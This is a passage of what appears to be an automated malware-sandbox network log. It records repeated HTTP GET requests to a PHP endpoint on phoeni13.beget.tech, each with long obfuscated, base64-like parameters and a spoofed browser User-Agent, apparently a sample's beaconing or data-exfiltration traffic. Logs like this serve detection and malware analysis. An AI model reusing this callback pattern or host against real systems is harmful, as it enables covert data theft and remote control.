jN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXUq9EeNp2TzUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZ